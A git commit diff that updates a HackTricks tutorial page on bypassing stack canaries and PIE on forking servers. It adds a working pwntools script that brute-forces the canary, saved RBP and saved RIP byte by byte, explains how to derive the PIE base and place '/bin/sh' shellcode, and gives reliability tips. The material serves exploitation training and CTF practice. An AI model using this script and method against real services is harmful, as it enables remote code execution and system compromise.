Merge pull request #2156 from HackTricks-wiki/research_update_src_binary-exploitation_common-binary-protections-and-bypasses_pie_bypassing-canary-and-pie_20260422_032134

carlospolop · web-flow · commit c437e280d8b3 · 2026-04-22T08:04:57.000+02:00
Research Update Enhanced src/binary-exploitation/common-bina...
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -18,56 +18,61 @@ For example, if a binary is protected using both a **canary** and **PIE**, you c
 > [!TIP]
 > It's supposed that the return address inside the stack belongs to the main binary code, which, if the vulnerability is located in the binary code, will usually be the case.
 
-To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
+This technique is specially useful when **each failed probe only kills the current worker but does not rerandomize the parent state** (for example, a `fork()`-per-connection server or a service that respawns workers without `execve()`). If you first need to brute-force the canary in that scenario, check [BF Forked & Threaded Stack Canaries](../stack-canaries/bf-forked-stack-canaries.md).
+
+To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program outputs something or it just doesn't crash. The **same primitive** used to brute-force the canary can be reused to leak the saved `RBP` and the saved `RIP`:
+
+<details>
+<summary>Python3 helper to brute-force the canary, saved RBP and saved RIP</summary>
 
 ```python
 from pwn import *
 
+HOST, PORT = "localhost", 8788
+
+
 def connect():
-    r = remote("localhost", 8788)
-
-def get_bf(base):
-    canary = ""
-    guess = 0x0
-    base += canary
-
-    while len(canary) < 8:
-        while guess != 0xff:
-            r = connect()
-
-            r.recvuntil("Username: ")
-            r.send(base + chr(guess))
-
-            if "SOME OUTPUT" in r.clean():
-                print "Guessed correct byte:", format(guess, '02x')
-                canary += chr(guess)
-                base += chr(guess)
-                guess = 0x0
-                r.close()
+    return remote(HOST, PORT)
+
+
+def brute_qword(prefix, prompt=b"Username: ", success=b"SOME OUTPUT"):
+    leaked = b""
+
+    while len(leaked) < 8:
+        for guess in range(0x100):
+            io = connect()
+            io.recvuntil(prompt)
+            io.send(prefix + leaked + bytes([guess]))
+            out = io.clean(timeout=0.2)
+            io.close()
+
+            if success in out:
+                leaked += bytes([guess])
+                log.info("byte %d = %#x", len(leaked), guess)
                 break
-            else:
-                guess += 1
-                r.close()
-
-    print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
-    return base
-
-# CANARY BF HERE
-canary_offset = 1176
-base = "A" * canary_offset
-print("Brute-Forcing canary")
-base_canary = get_bf(base) #Get yunk data + canary
-CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
-
-# PIE BF FROM HERE
-print("Brute-Forcing RBP")
-base_canary_rbp = get_bf(base_canary)
-RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:])
-print("Brute-Forcing RIP")
-base_canary_rbp_rip = get_bf(base_canary_rbp)
-RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
+        else:
+            raise RuntimeError("No valid byte found")
+
+    return prefix + leaked
+
+
+offset = 1176
+payload = b"A" * offset
+
+payload = brute_qword(payload)  # canary
+CANARY = u64(payload[-8:])
+
+payload = brute_qword(payload)  # saved RBP
+RBP = u64(payload[-8:])
+
+payload = brute_qword(payload)  # saved RIP
+RIP = u64(payload[-8:])
 ```
 
+</details>
+
+If the target reads with `gets`/`fgets`-style functions, remember to remove terminators such as `\n` from the candidate alphabet. With `read`/`recv`, brute-forcing all byte values is usually fine.
+
 The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
 
 From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
@@ -77,23 +82,37 @@ INI_SHELLCODE = RBP - 1152
 ```
 
 From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
-To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
+To calculate the base address, disassemble the binary and identify the **exact static offset of the return site** pointed to by the saved `RIP` (`objdump -d`, `r2 -A`, `gef`, `pwndbg`, etc.):
 
 ![](<../../../images/image (479).png>)
 
-In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf` the base address is `0x562002970000`
+The **reliable** calculation is to subtract that static offset from the leaked runtime address:
 
 ```python
-elf.address = RIP - (RIP & 0xfff)
+RET_OFFSET = 0x13cf  # example: instruction after the call to the vulnerable function
+elf.address = RIP - RET_OFFSET
+assert elf.address & 0xfff == 0
 ```
 
-## Improvements
+If the leaked `RIP` is known to belong to the **first executable page** of a small binary, page-aligning it can still be enough as a quick shortcut or sanity check. For example, if you leak `0x562002970ecf`, then the page containing that instruction starts at `0x562002970000`:
 
-According to [**some observation from this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), it's possible that when leaking RBP and RIP values, the server won't crash with some values which aren't the correct ones and the BF script will think he got the good ones. This is because it's possible that **some addresses just won't break it even if there aren't exactly the correct ones**.
+```python
+page_base = RIP - (RIP & 0xfff)
+```
 
-According to that blog post it's recommended to add a short delay between requests to the server is introduced.
+## Improvements
 
-{{#include ../../../banners/hacktricks-training.md}}
+Blindly treating **"no crash"** as **"correct byte"** is fragile for saved `RBP` and saved `RIP` values. In practice, the following tweaks make this attack much more reliable:
 
+- **Use timeouts for saved `RBP` guesses**: a wrong value used by `leave; ret` may survive longer than a bad canary or a bad return address, so remote targets usually need a larger timeout than local tests.
+- **Introduce a short delay between probes**: sending requests too quickly can leave many workers/processes around, fill memory, or accumulate `TIME_WAIT` sockets, creating false positives unrelated to the guessed byte.
+- **Do not brute-force bytes you already know**: if disassembly shows that the target return site must end in a fixed tail such as `...e06`, brute-force only the randomized byte or nibble(s). On amd64, the low 12 bits inside the page are constant for a given return site.
+- **Validate candidates more than once**: a wrong `RIP` can still return into valid code and print output. Requiring the same candidate to succeed several times, or validating it with a known stop gadget as in [BROP](../../rop-return-oriented-programing/brop-blind-return-oriented-programming.md), reduces false positives.
+- **Re-check the stack delta after leaking `RBP`**: the distance from the leaked frame pointer to your controlled buffer can change with stack alignment, so measure that delta for the leaked frame layout instead of assuming a single constant.
 
+## References
 
+- [https://github.com/datajerk/ctf-write-ups/blob/master/nahamconctf2020/ripe_reader/README.md](https://github.com/datajerk/ctf-write-ups/blob/master/nahamconctf2020/ripe_reader/README.md)
+- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking)
+
+{{#include ../../../banners/hacktricks-training.md}}
